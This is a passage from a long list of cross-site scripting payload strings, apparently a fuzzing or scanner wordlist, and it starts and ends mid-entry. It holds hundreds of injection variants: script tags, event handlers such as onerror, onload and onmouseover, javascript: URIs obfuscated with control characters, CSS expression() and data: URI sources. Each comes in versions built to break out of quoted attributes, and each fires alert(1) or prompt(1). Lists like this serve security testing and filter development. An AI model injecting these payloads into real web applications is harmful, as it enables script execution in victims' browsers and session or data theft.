onerror=?#@~^CAAAAA==C^+.D`8#mgIAAA==^#~@? src=a>", '<script>var a = ?</script><script>alert(1)</script>', '</ScrIpt><script>var a = ?</script><script>alert(1)</script>', '"><script>var a = ?</script><script>alert(1)</script>', '</ScrIpt><script>var a = ?</script><script>alert(1)</script>', "'><script>var a = ?</script><script>alert(1)</script>", '</ScrIpt><script>var a = ?</script><script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', '"><script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', "'><script>alert(1)</script>", '</ScrIpt><script>alert(1)</script>', '<scr%00ipt%20&message=> alert(?X?)</script>', '"><scr%00ipt%20&message=> alert(?X?)</script>', "'><scr%00ipt%20&message=> alert(?X?)</script>", '?<script>prompt(1)</script>', '</ScrIpt><script>prompt(1)</script>', '"><script>prompt(1)</script>', '</ScrIpt><script>prompt(1)</script>', "'><script>prompt(1)</script>", '</ScrIpt><script>prompt(1)</script>', '?;alert(1)//', '?-alert(1)-?', '?<script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', '"><script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', "'><script>alert(1)</script>", '</ScrIpt><script>alert(1)</script>', '?;prompt(1)//', '?-prompt(1)-?', '<input type="text" AUTOFOCUS onfocus=alert(1)>', '"><input type="text" AUTOFOCUS onfocus=alert(1)>', '\'><input type="text" AUTOFOCUS onfocus=alert(1)>', '<script\\x20type="text/javascript">javascript:alert(1);</script>', '"><script\\x20type="text/javascript">javascript:alert(1);</script>', '\'><script\\x20type="text/javascript">javascript:alert(1);</script>', '<script\\x3Etype="text/javascript">javascript:alert(1);</script>', '"><script\\x3Etype="text/javascript">javascript:alert(1);</script>', '\'><script\\x3Etype="text/javascript">javascript:alert(1);</script>', '<script\\x0Dtype="text/javascript">javascript:alert(1);</script>', '"><script\\x0Dtype="text/javascript">javascript:alert(1);</script>', '\'><script\\x0Dtype="text/javascript">javascript:alert(1);</script>', '<script\\x09type="text/javascript">javascript:alert(1);</script>', '"><script\\x09type="text/javascript">javascript:alert(1);</script>', '\'><script\\x09type="text/javascript">javascript:alert(1);</script>', '<script\\x0Ctype="text/javascript">javascript:alert(1);</script>', '"><script\\x0Ctype="text/javascript">javascript:alert(1);</script>', '\'><script\\x0Ctype="text/javascript">javascript:alert(1);</script>', '<script\\x2Ftype="text/javascript">javascript:alert(1);</script>', '"><script\\x2Ftype="text/javascript">javascript:alert(1);</script>', '\'><script\\x2Ftype="text/javascript">javascript:alert(1);</script>', '<script\\x0Atype="text/javascript">javascript:alert(1);</script>', '"><script\\x0Atype="text/javascript">javascript:alert(1);</script>', '\'><script\\x0Atype="text/javascript">javascript:alert(1);</script>', '\'`"><\\x00script>javascript:alert(1)</script>', '<img src=1 href=1 onerror="javascript:alert(1)"></img>', '"><img src=1 href=1 onerror="javascript:alert(1)"></img>', '\'><img src=1 href=1 onerror="javascript:alert(1)"></img>', '<audio src=1 href=1 onerror="javascript:alert(1)"></audio>', '"><audio src=1 href=1 onerror="javascript:alert(1)"></audio>', '\'><audio src=1 href=1 onerror="javascript:alert(1)"></audio>', '<video src=1 href=1 onerror="javascript:alert(1)"></video>', '"><video src=1 href=1 onerror="javascript:alert(1)"></video>', '\'><video src=1 href=1 onerror="javascript:alert(1)"></video>', '<body src=1 href=1 onerror="javascript:alert(1)"></body>', '"><body src=1 href=1 onerror="javascript:alert(1)"></body>', '\'><body src=1 href=1 onerror="javascript:alert(1)"></body>', '<image src=1 href=1 onerror="javascript:alert(1)"></image>', '"><image src=1 href=1 onerror="javascript:alert(1)"></image>', '\'><image src=1 href=1 onerror="javascript:alert(1)"></image>', '<object src=1 href=1 onerror="javascript:alert(1)"></object>', '"><object src=1 href=1 onerror="javascript:alert(1)"></object>', '\'><object src=1 href=1 onerror="javascript:alert(1)"></object>', '<script src=1 href=1 onerror="javascript:alert(1)"></script>', '"><script src=1 href=1 onerror="javascript:alert(1)"></script>', '\'><script src=1 href=1 onerror="javascript:alert(1)"></script>', '<svg onResize svg onResize="javascript:javascript:alert(1)"></svg onResize>', '"><svg onResize svg onResize="javascript:javascript:alert(1)"></svg onResize>', '\'><svg onResize svg onResize="javascript:javascript:alert(1)"></svg onResize>', '<title onPropertyChange title onPropertyChange="javascript:javascript:alert(1)"></title onPropertyChange>', '"><title onPropertyChange title onPropertyChange="javascript:javascript:alert(1)"></title onPropertyChange>', '\'><title onPropertyChange title onPropertyChange="javascript:javascript:alert(1)"></title onPropertyChange>', '<iframe onLoad iframe onLoad="javascript:javascript:alert(1)"></iframe onLoad>', '"><iframe onLoad iframe onLoad="javascript:javascript:alert(1)"></iframe onLoad>', '\'><iframe onLoad iframe onLoad="javascript:javascript:alert(1)"></iframe onLoad>', '<body onMouseEnter body onMouseEnter="javascript:javascript:alert(1)"></body onMouseEnter>', '"><body onMouseEnter body onMouseEnter="javascript:javascript:alert(1)"></body onMouseEnter>', '\'><body onMouseEnter body onMouseEnter="javascript:javascript:alert(1)"></body onMouseEnter>', '<body onFocus body onFocus="javascript:javascript:alert(1)"></body onFocus>', '"><body onFocus body onFocus="javascript:javascript:alert(1)"></body onFocus>', '\'><body onFocus body onFocus="javascript:javascript:alert(1)"></body onFocus>', '<frameset onScroll frameset onScroll="javascript:javascript:alert(1)"></frameset onScroll>', '"><frameset onScroll frameset onScroll="javascript:javascript:alert(1)"></frameset onScroll>', '\'><frameset onScroll frameset onScroll="javascript:javascript:alert(1)"></frameset onScroll>', '<script onReadyStateChange script onReadyStateChange="javascript:javascript:alert(1)"></script onReadyStateChange>', '"><script onReadyStateChange script onReadyStateChange="javascript:javascript:alert(1)"></script onReadyStateChange>', '\'><script onReadyStateChange script onReadyStateChange="javascript:javascript:alert(1)"></script onReadyStateChange>', '<html onMouseUp html onMouseUp="javascript:javascript:alert(1)"></html onMouseUp>', '"><html onMouseUp html onMouseUp="javascript:javascript:alert(1)"></html onMouseUp>', '\'><html onMouseUp html onMouseUp="javascript:javascript:alert(1)"></html onMouseUp>', '<body onPropertyChange body onPropertyChange="javascript:javascript:alert(1)"></body onPropertyChange>', '"><body onPropertyChange body onPropertyChange="javascript:javascript:alert(1)"></body onPropertyChange>', '\'><body onPropertyChange body onPropertyChange="javascript:javascript:alert(1)"></body onPropertyChange>', '<svg onLoad svg onLoad="javascript:javascript:alert(1)"></svg onLoad>', '"><svg onLoad svg onLoad="javascript:javascript:alert(1)"></svg onLoad>', '\'><svg onLoad svg onLoad="javascript:javascript:alert(1)"></svg onLoad>', '<body onPageHide body onPageHide="javascript:javascript:alert(1)"></body onPageHide>', '"><body onPageHide body onPageHide="javascript:javascript:alert(1)"></body onPageHide>', '\'><body onPageHide body onPageHide="javascript:javascript:alert(1)"></body onPageHide>', '<body onMouseOver body onMouseOver="javascript:javascript:alert(1)"></body onMouseOver>', '"><body onMouseOver body onMouseOver="javascript:javascript:alert(1)"></body onMouseOver>', '\'><body onMouseOver body onMouseOver="javascript:javascript:alert(1)"></body onMouseOver>', '<body onUnload body onUnload="javascript:javascript:alert(1)"></body onUnload>', '"><body onUnload body onUnload="javascript:javascript:alert(1)"></body onUnload>', '\'><body onUnload body onUnload="javascript:javascript:alert(1)"></body onUnload>', '<body onLoad body onLoad="javascript:javascript:alert(1)"></body onLoad>', '"><body onLoad body onLoad="javascript:javascript:alert(1)"></body onLoad>', '\'><body onLoad body onLoad="javascript:javascript:alert(1)"></body onLoad>', '<bgsound onPropertyChange bgsound onPropertyChange="javascript:javascript:alert(1)"></bgsound onPropertyChange>', '"><bgsound onPropertyChange bgsound onPropertyChange="javascript:javascript:alert(1)"></bgsound onPropertyChange>', '\'><bgsound onPropertyChange bgsound onPropertyChange="javascript:javascript:alert(1)"></bgsound onPropertyChange>', '<html onMouseLeave html onMouseLeave="javascript:javascript:alert(1)"></html onMouseLeave>', '"><html onMouseLeave html onMouseLeave="javascript:javascript:alert(1)"></html onMouseLeave>', '\'><html onMouseLeave html onMouseLeave="javascript:javascript:alert(1)"></html onMouseLeave>', '<html onMouseWheel html onMouseWheel="javascript:javascript:alert(1)"></html onMouseWheel>', '"><html onMouseWheel html onMouseWheel="javascript:javascript:alert(1)"></html onMouseWheel>', '\'><html onMouseWheel html onMouseWheel="javascript:javascript:alert(1)"></html onMouseWheel>', '<style onLoad style onLoad="javascript:javascript:alert(1)"></style onLoad>', '"><style onLoad style onLoad="javascript:javascript:alert(1)"></style onLoad>', '\'><style onLoad style onLoad="javascript:javascript:alert(1)"></style onLoad>', '<iframe onReadyStateChange iframe onReadyStateChange="javascript:javascript:alert(1)"></iframe onReadyStateChange>', '"><iframe onReadyStateChange iframe onReadyStateChange="javascript:javascript:alert(1)"></iframe onReadyStateChange>', '\'><iframe onReadyStateChange iframe onReadyStateChange="javascript:javascript:alert(1)"></iframe onReadyStateChange>', '<body onPageShow body onPageShow="javascript:javascript:alert(1)"></body onPageShow>', '"><body onPageShow body onPageShow="javascript:javascript:alert(1)"></body onPageShow>', '\'><body onPageShow body onPageShow="javascript:javascript:alert(1)"></body onPageShow>', '<style onReadyStateChange style onReadyStateChange="javascript:javascript:alert(1)"></style onReadyStateChange>', '"><style onReadyStateChange style onReadyStateChange="javascript:javascript:alert(1)"></style onReadyStateChange>', '\'><style onReadyStateChange style onReadyStateChange="javascript:javascript:alert(1)"></style onReadyStateChange>', '<frameset onFocus frameset onFocus="javascript:javascript:alert(1)"></frameset onFocus>', '"><frameset onFocus frameset onFocus="javascript:javascript:alert(1)"></frameset onFocus>', '\'><frameset onFocus frameset onFocus="javascript:javascript:alert(1)"></frameset onFocus>', '<applet onError applet onError="javascript:javascript:alert(1)"></applet onError>', '"><applet onError applet onError="javascript:javascript:alert(1)"></applet onError>', '\'><applet onError applet onError="javascript:javascript:alert(1)"></applet onError>', '<marquee onStart marquee onStart="javascript:javascript:alert(1)"></marquee onStart>', '"><marquee onStart marquee onStart="javascript:javascript:alert(1)"></marquee onStart>', '\'><marquee onStart marquee onStart="javascript:javascript:alert(1)"></marquee onStart>', '<script onLoad script onLoad="javascript:javascript:alert(1)"></script onLoad>', '"><script onLoad script onLoad="javascript:javascript:alert(1)"></script onLoad>', '\'><script onLoad script onLoad="javascript:javascript:alert(1)"></script onLoad>', '<html onMouseOver html onMouseOver="javascript:javascript:alert(1)"></html onMouseOver>', '"><html onMouseOver html onMouseOver="javascript:javascript:alert(1)"></html onMouseOver>', '\'><html onMouseOver html onMouseOver="javascript:javascript:alert(1)"></html onMouseOver>', '<html onMouseEnter html onMouseEnter="javascript:parent.javascript:alert(1)"></html onMouseEnter>', '"><html onMouseEnter html onMouseEnter="javascript:parent.javascript:alert(1)"></html onMouseEnter>', '\'><html onMouseEnter html onMouseEnter="javascript:parent.javascript:alert(1)"></html onMouseEnter>', '<body onBeforeUnload body onBeforeUnload="javascript:javascript:alert(1)"></body onBeforeUnload>', '"><body onBeforeUnload body onBeforeUnload="javascript:javascript:alert(1)"></body onBeforeUnload>', '\'><body onBeforeUnload body onBeforeUnload="javascript:javascript:alert(1)"></body onBeforeUnload>', '<html onMouseDown html onMouseDown="javascript:javascript:alert(1)"></html onMouseDown>', '"><html onMouseDown html onMouseDown="javascript:javascript:alert(1)"></html onMouseDown>', '\'><html onMouseDown html onMouseDown="javascript:javascript:alert(1)"></html onMouseDown>', '<marquee onScroll marquee onScroll="javascript:javascript:alert(1)"></marquee onScroll>', '"><marquee onScroll marquee onScroll="javascript:javascript:alert(1)"></marquee onScroll>', '\'><marquee onScroll marquee onScroll="javascript:javascript:alert(1)"></marquee onScroll>', '<xml onPropertyChange xml onPropertyChange="javascript:javascript:alert(1)"></xml onPropertyChange>', '"><xml onPropertyChange xml onPropertyChange="javascript:javascript:alert(1)"></xml onPropertyChange>', '\'><xml onPropertyChange xml onPropertyChange="javascript:javascript:alert(1)"></xml onPropertyChange>', '<frameset onBlur frameset onBlur="javascript:javascript:alert(1)"></frameset onBlur>', '"><frameset onBlur frameset onBlur="javascript:javascript:alert(1)"></frameset onBlur>', '\'><frameset onBlur frameset onBlur="javascript:javascript:alert(1)"></frameset onBlur>', '<applet onReadyStateChange applet onReadyStateChange="javascript:javascript:alert(1)"></applet onReadyStateChange>', '"><applet onReadyStateChange applet onReadyStateChange="javascript:javascript:alert(1)"></applet onReadyStateChange>', '\'><applet onReadyStateChange applet onReadyStateChange="javascript:javascript:alert(1)"></applet onReadyStateChange>', '<svg onUnload svg onUnload="javascript:javascript:alert(1)"></svg onUnload>', '"><svg onUnload svg onUnload="javascript:javascript:alert(1)"></svg onUnload>', '\'><svg onUnload svg onUnload="javascript:javascript:alert(1)"></svg onUnload>', '<html onMouseOut html onMouseOut="javascript:javascript:alert(1)"></html onMouseOut>', '"><html onMouseOut html onMouseOut="javascript:javascript:alert(1)"></html onMouseOut>', '\'><html onMouseOut html onMouseOut="javascript:javascript:alert(1)"></html onMouseOut>', '<body onMouseMove body onMouseMove="javascript:javascript:alert(1)"></body onMouseMove>', '"><body onMouseMove body onMouseMove="javascript:javascript:alert(1)"></body onMouseMove>', '\'><body onMouseMove body onMouseMove="javascript:javascript:alert(1)"></body onMouseMove>', '<body onResize body onResize="javascript:javascript:alert(1)"></body onResize>', '"><body onResize body onResize="javascript:javascript:alert(1)"></body onResize>', '\'><body onResize body onResize="javascript:javascript:alert(1)"></body onResize>', '<object onError object onError="javascript:javascript:alert(1)"></object onError>', '"><object onError object onError="javascript:javascript:alert(1)"></object onError>', '\'><object onError object onError="javascript:javascript:alert(1)"></object onError>', '<body onPopState body onPopState="javascript:javascript:alert(1)"></body onPopState>', '"><body onPopState body onPopState="javascript:javascript:alert(1)"></body onPopState>', '\'><body onPopState body onPopState="javascript:javascript:alert(1)"></body onPopState>', '<html onMouseMove html onMouseMove="javascript:javascript:alert(1)"></html onMouseMove>', '"><html onMouseMove html onMouseMove="javascript:javascript:alert(1)"></html onMouseMove>', '\'><html onMouseMove html onMouseMove="javascript:javascript:alert(1)"></html onMouseMove>', '<applet onreadystatechange applet onreadystatechange="javascript:javascript:alert(1)"></applet onreadystatechange>', '"><applet onreadystatechange applet onreadystatechange="javascript:javascript:alert(1)"></applet onreadystatechange>', '\'><applet onreadystatechange applet onreadystatechange="javascript:javascript:alert(1)"></applet onreadystatechange>', '<body onpagehide body onpagehide="javascript:javascript:alert(1)"></body onpagehide>', '"><body onpagehide body onpagehide="javascript:javascript:alert(1)"></body onpagehide>', '\'><body onpagehide body onpagehide="javascript:javascript:alert(1)"></body onpagehide>', '<svg onunload svg onunload="javascript:javascript:alert(1)"></svg onunload>', '"><svg onunload svg onunload="javascript:javascript:alert(1)"></svg onunload>', '\'><svg onunload svg onunload="javascript:javascript:alert(1)"></svg onunload>', '<applet onerror applet onerror="javascript:javascript:alert(1)"></applet onerror>', '"><applet onerror applet onerror="javascript:javascript:alert(1)"></applet onerror>', '\'><applet onerror applet onerror="javascript:javascript:alert(1)"></applet onerror>', '<body onkeyup body onkeyup="javascript:javascript:alert(1)"></body onkeyup>', '"><body onkeyup body onkeyup="javascript:javascript:alert(1)"></body onkeyup>', '\'><body onkeyup body onkeyup="javascript:javascript:alert(1)"></body onkeyup>', '<body onunload body onunload="javascript:javascript:alert(1)"></body onunload>', '"><body onunload body onunload="javascript:javascript:alert(1)"></body onunload>', '\'><body onunload body onunload="javascript:javascript:alert(1)"></body onunload>', '<iframe onload iframe onload="javascript:javascript:alert(1)"></iframe onload>', '"><iframe onload iframe onload="javascript:javascript:alert(1)"></iframe onload>', '\'><iframe onload iframe onload="javascript:javascript:alert(1)"></iframe onload>', '<body onload body onload="javascript:javascript:alert(1)"></body onload>', '"><body onload body onload="javascript:javascript:alert(1)"></body onload>', '\'><body onload body onload="javascript:javascript:alert(1)"></body onload>', '<html onmouseover html onmouseover="javascript:javascript:alert(1)"></html onmouseover>', '"><html onmouseover html onmouseover="javascript:javascript:alert(1)"></html onmouseover>', '\'><html onmouseover html onmouseover="javascript:javascript:alert(1)"></html onmouseover>', '<object onbeforeload object onbeforeload="javascript:javascript:alert(1)"></object onbeforeload>', '"><object onbeforeload object onbeforeload="javascript:javascript:alert(1)"></object onbeforeload>', '\'><object onbeforeload object onbeforeload="javascript:javascript:alert(1)"></object onbeforeload>', '<body onbeforeunload body onbeforeunload="javascript:javascript:alert(1)"></body onbeforeunload>', '"><body onbeforeunload body onbeforeunload="javascript:javascript:alert(1)"></body onbeforeunload>', '\'><body onbeforeunload body onbeforeunload="javascript:javascript:alert(1)"></body onbeforeunload>', '<body onfocus body onfocus="javascript:javascript:alert(1)"></body onfocus>', '"><body onfocus body onfocus="javascript:javascript:alert(1)"></body onfocus>', '\'><body onfocus body onfocus="javascript:javascript:alert(1)"></body onfocus>', '<body onkeydown body onkeydown="javascript:javascript:alert(1)"></body onkeydown>', '"><body onkeydown body onkeydown="javascript:javascript:alert(1)"></body onkeydown>', '\'><body onkeydown body onkeydown="javascript:javascript:alert(1)"></body onkeydown>', '<iframe onbeforeload iframe onbeforeload="javascript:javascript:alert(1)"></iframe onbeforeload>', '"><iframe onbeforeload iframe onbeforeload="javascript:javascript:alert(1)"></iframe onbeforeload>', '\'><iframe onbeforeload iframe onbeforeload="javascript:javascript:alert(1)"></iframe onbeforeload>', '<iframe src iframe src="javascript:javascript:alert(1)"></iframe src>', '"><iframe src iframe src="javascript:javascript:alert(1)"></iframe src>', '\'><iframe src iframe src="javascript:javascript:alert(1)"></iframe src>', '<svg onload svg onload="javascript:javascript:alert(1)"></svg onload>', '"><svg onload svg onload="javascript:javascript:alert(1)"></svg onload>', '\'><svg onload svg onload="javascript:javascript:alert(1)"></svg onload>', '<html onmousemove html onmousemove="javascript:javascript:alert(1)"></html onmousemove>', '"><html onmousemove html onmousemove="javascript:javascript:alert(1)"></html onmousemove>', '\'><html onmousemove html onmousemove="javascript:javascript:alert(1)"></html onmousemove>', '<body onblur body onblur="javascript:javascript:alert(1)"></body onblur>', '"><body onblur body onblur="javascript:javascript:alert(1)"></body onblur>', '\'><body onblur body onblur="javascript:javascript:alert(1)"></body onblur>', '\\x3Cscript>javascript:alert(1)</script>', '\'"`><script>/* *\\x2Fjavascript:alert(1)// */</script>', '<script>javascript:alert(1)</script\\x0D', '</ScrIpt><script>javascript:alert(1)</script\\x0D', '"><script>javascript:alert(1)</script\\x0D', '</ScrIpt><script>javascript:alert(1)</script\\x0D', "'><script>javascript:alert(1)</script\\x0D", '</ScrIpt><script>javascript:alert(1)</script\\x0D', '<script>javascript:alert(1)</script\\x0A', '</ScrIpt><script>javascript:alert(1)</script\\x0A', '"><script>javascript:alert(1)</script\\x0A', '</ScrIpt><script>javascript:alert(1)</script\\x0A', "'><script>javascript:alert(1)</script\\x0A", '</ScrIpt><script>javascript:alert(1)</script\\x0A', '<script>javascript:alert(1)</script\\x0B', '</ScrIpt><script>javascript:alert(1)</script\\x0B', '"><script>javascript:alert(1)</script\\x0B', '</ScrIpt><script>javascript:alert(1)</script\\x0B', "'><script>javascript:alert(1)</script\\x0B", '</ScrIpt><script>javascript:alert(1)</script\\x0B', '<script charset="\\x22>javascript:alert(1)</script>', '"><script charset="\\x22>javascript:alert(1)</script>', '\'><script charset="\\x22>javascript:alert(1)</script>', '<!--\\x3E<img src=xxx:x onerror=javascript:alert(1)> -->', '"><!--\\x3E<img src=xxx:x onerror=javascript:alert(1)> -->', "'><!--\\x3E<img src=xxx:x onerror=javascript:alert(1)> -->", '--><!-- ---> <img src=xxx:x onerror=javascript:alert(1)> -->', '--><!-- --\\x00> <img src=xxx:x onerror=javascript:alert(1)> -->', '--><!-- --\\x21> <img src=xxx:x onerror=javascript:alert(1)> -->', '--><!-- --\\x3E> <img src=xxx:x onerror=javascript:alert(1)> -->', '`"\'><img src=\'#\\x27 onerror=javascript:alert(1)>', '<a href="javascript\\x3Ajavascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="javascript\\x3Ajavascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="javascript\\x3Ajavascript:alert(1)" id="fuzzelement1">test</a>', '"\'`><p><svg><script>a=\'hello\\x27;javascript:alert(1)//\';</script></p>', '<a href="javas\\x00cript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="javas\\x00cript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="javas\\x00cript:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="javas\\x07cript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="javas\\x07cript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="javas\\x07cript:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="javas\\x0Dcript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="javas\\x0Dcript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="javas\\x0Dcript:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="javas\\x0Acript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="javas\\x0Acript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="javas\\x0Acript:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="javas\\x08cript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="javas\\x08cript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="javas\\x08cript:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="javas\\x02cript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="javas\\x02cript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="javas\\x02cript:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="javas\\x03cript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="javas\\x03cript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="javas\\x03cript:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="javas\\x04cript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="javas\\x04cript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="javas\\x04cript:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="javas\\x01cript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="javas\\x01cript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="javas\\x01cript:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="javas\\x05cript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="javas\\x05cript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="javas\\x05cript:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="javas\\x0Bcript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="javas\\x0Bcript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="javas\\x0Bcript:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="javas\\x09cript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="javas\\x09cript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="javas\\x09cript:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="javas\\x06cript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="javas\\x06cript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="javas\\x06cript:javascript:alert(1)" id="fuzzelement1">test</a>', '<a href="javas\\x0Ccript:javascript:alert(1)" id="fuzzelement1">test</a>', '"><a href="javas\\x0Ccript:javascript:alert(1)" id="fuzzelement1">test</a>', '\'><a href="javas\\x0Ccript:javascript:alert(1)" id="fuzzelement1">test</a>', '<script>/* *\\x2A/javascript:alert(1)// */</script>', '</ScrIpt><script>/* *\\x2A/javascript:alert(1)// */</script>', '"><script>/* *\\x2A/javascript:alert(1)// */</script>', '</ScrIpt><script>/* *\\x2A/javascript:alert(1)// */</script>', "'><script>/* *\\x2A/javascript:alert(1)// */</script>", '</ScrIpt><script>/* *\\x2A/javascript:alert(1)// */</script>', '<script>/* *\\x00/javascript:alert(1)// */</script>', '</ScrIpt><script>/* *\\x00/javascript:alert(1)// */</script>', '"><script>/* *\\x00/javascript:alert(1)// */</script>', '</ScrIpt><script>/* *\\x00/javascript:alert(1)// */</script>', "'><script>/* *\\x00/javascript:alert(1)// */</script>", '</ScrIpt><script>/* *\\x00/javascript:alert(1)// */</script>', '<style></style\\x3E<img src="about:blank" onerror=javascript:alert(1)//></style>', '"><style></style\\x3E<img src="about:blank" onerror=javascript:alert(1)//></style>', '\'><style></style\\x3E<img src="about:blank" onerror=javascript:alert(1)//></style>', '<style></style\\x0D<img src="about:blank" onerror=javascript:alert(1)//></style>', '"><style></style\\x0D<img src="about:blank" onerror=javascript:alert(1)//></style>', '\'><style></style\\x0D<img src="about:blank" onerror=javascript:alert(1)//></style>', '<style></style\\x09<img src="about:blank" onerror=javascript:alert(1)//></style>', '"><style></style\\x09<img src="about:blank" onerror=javascript:alert(1)//></style>', '\'><style></style\\x09<img src="about:blank" onerror=javascript:alert(1)//></style>', '<style></style\\x20<img src="about:blank" onerror=javascript:alert(1)//></style>', '"><style></style\\x20<img src="about:blank" onerror=javascript:alert(1)//></style>', '\'><style></style\\x20<img src="about:blank" onerror=javascript:alert(1)//></style>', '<style></style\\x0A<img src="about:blank" onerror=javascript:alert(1)//></style>', '"><style></style\\x0A<img src="about:blank" onerror=javascript:alert(1)//></style>', '\'><style></style\\x0A<img src="about:blank" onerror=javascript:alert(1)//></style>', '"\'`>ABC<div style="font-family:\'foo\'\\x7Dx:expression(javascript:alert(1);/*\';">DEF', '"\'`>ABC<div style="font-family:\'foo\'\\x3Bx:expression(javascript:alert(1);/*\';">DEF', '<script>if("x\\\\xE1\\x96\\x89".length==2) { javascript:alert(1);}</script>', '</ScrIpt><script>if("x\\\\xE1\\x96\\x89".length==2) { javascript:alert(1);}</script>', '"><script>if("x\\\\xE1\\x96\\x89".length==2) { javascript:alert(1);}</script>', '</ScrIpt><script>if("x\\\\xE1\\x96\\x89".length==2) { javascript:alert(1);}</script>', '\'><script>if("x\\\\xE1\\x96\\x89".length==2) { javascript:alert(1);}</script>', '</ScrIpt><script>if("x\\\\xE1\\x96\\x89".length==2) { javascript:alert(1);}</script>', '<script>if("x\\\\xE0\\xB9\\x92".length==2) { javascript:alert(1);}</script>', '</ScrIpt><script>if("x\\\\xE0\\xB9\\x92".length==2) { javascript:alert(1);}</script>', '"><script>if("x\\\\xE0\\xB9\\x92".length==2) { javascript:alert(1);}</script>', '</ScrIpt><script>if("x\\\\xE0\\xB9\\x92".length==2) { javascript:alert(1);}</script>', '\'><script>if("x\\\\xE0\\xB9\\x92".length==2) { javascript:alert(1);}</script>', '</ScrIpt><script>if("x\\\\xE0\\xB9\\x92".length==2) { javascript:alert(1);}</script>', '<script>if("x\\\\xEE\\xA9\\x93".length==2) { javascript:alert(1);}</script>', '</ScrIpt><script>if("x\\\\xEE\\xA9\\x93".length==2) { javascript:alert(1);}</script>', '"><script>if("x\\\\xEE\\xA9\\x93".length==2) { javascript:alert(1);}</script>', '</ScrIpt><script>if("x\\\\xEE\\xA9\\x93".length==2) { javascript:alert(1);}</script>', '\'><script>if("x\\\\xEE\\xA9\\x93".length==2) { javascript:alert(1);}</script>', '</ScrIpt><script>if("x\\\\xEE\\xA9\\x93".length==2) { javascript:alert(1);}</script>', '\'`"><\\x3Cscript>javascript:alert(1)</script>', '"\'`><\\x3Cimg src=xxx:x onerror=javascript:alert(1)>', '"\'`><\\x00img src=xxx:x onerror=javascript:alert(1)>', '<script src="data:text/plain\\x2Cjavascript:alert(1)"></script>', '"><script src="data:text/plain\\x2Cjavascript:alert(1)"></script>', '\'><script src="data:text/plain\\x2Cjavascript:alert(1)"></script>', '<script src="data:\\xD4\\x8F,javascript:alert(1)"></script>', '"><script src="data:\\xD4\\x8F,javascript:alert(1)"></script>', '\'><script src="data:\\xD4\\x8F,javascript:alert(1)"></script>', '<script src="data:\\xE0\\xA4\\x98,javascript:alert(1)"></script>', '"><script src="data:\\xE0\\xA4\\x98,javascript:alert(1)"></script>', '\'><script src="data:\\xE0\\xA4\\x98,javascript:alert(1)"></script>', '<script src="data:\\xCB\\x8F,javascript:alert(1)"></script>', '"><script src="data:\\xCB\\x8F,javascript:alert(1)"></script>', '\'><script src="data:\\xCB\\x8F,javascript:alert(1)"></script>', 'ABC<div style="x\\x3Aexpression(javascript:alert(1)">DEF', 'ABC<div style="x:expression\\x5C(javascript:alert(1)">DEF', 'ABC<div style="x:expression\\x00(javascript:alert(1)">DEF', 'ABC<div style="x:exp\\x00ression(javascript:alert(1)">DEF', 'ABC<div style="x:exp\\x5Cression(javascript:alert(1)">DEF', 'ABC<div style="x:\\x0Aexpression(javascript:alert(1)">DEF', 'ABC<div style="x:\\x09expression(javascript:alert(1)">DEF', 'ABC<div style="x:\\xE3\\x80\\x80expression(javascript:alert(1)">DEF', 'ABC<div style="x:\\xE2\\x80\\x84expression(javascript:alert(1)">DEF', 'ABC<div style="x:\\xC2\\xA0expression(javascript:alert(1)">DEF', 'ABC<div style="x:\\xE2\\x80\\x80expression(javascript:alert(1)">DEF', 'ABC<div style="x:\\xE2\\x80\\x8Aexpression(javascript:alert(1)">DEF', 'ABC<div style="x:\\x0Dexpression(javascript:alert(1)">DEF', 'ABC<div style="x:\\x0Cexpression(javascript:alert(1)">DEF', 'ABC<div style="x:\\xE2\\x80\\x87expression(javascript:alert(1)">DEF', 'ABC<div style="x:\\xEF\\xBB\\xBFexpression(javascript:alert(1)">DEF', 'ABC<div style="x:\\x20expression(javascript:alert(1)">DEF', 'ABC<div style="x:\\xE2\\x80\\x88expression(javascript:alert(1)">DEF', 'ABC<div style="x:\\x00expression(javascript:alert(1)">DEF', 'ABC<div style="x:\\xE2\\x80\\x8Bexpression(javascript:alert(1)">DEF', 'ABC<div style="x:\\xE2\\x80\\x86expression(javascript:alert(1)">DEF', 'ABC<div 